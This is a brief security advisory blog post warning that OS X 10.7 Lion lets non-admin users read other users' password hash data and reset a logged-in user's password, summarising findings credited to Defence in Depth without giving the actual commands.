PSA: Cracking Passwords in Lion is Far Too Simple

Defence in Depth has discovered a rather serious security flaw in OS X 10.7 Lion that allows non-admin users to view password hash data, which can be trivially cracked. Essentially, anyone that has local access to a Lion machine has the potential to access your account. Even worse, any currently logged in user can have their password completely reset with a one-line command. This requires the attacker to have either local or remote (SSH) access to an already logged-in machine, but unlike most damaging commands, it does not require the user to enter their password to execute. This means that if you step away from your laptop for a quick trip to the bathroom, you may return to a compromised machine. Whether Apple is working on a fix is unknown, but for the time being, please be aware of the issue.

This ShadowHashData attribute actually contains the same hash stored in user bob’s shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user’s profile.

[Defence in Depth]

Post a response / What do you think?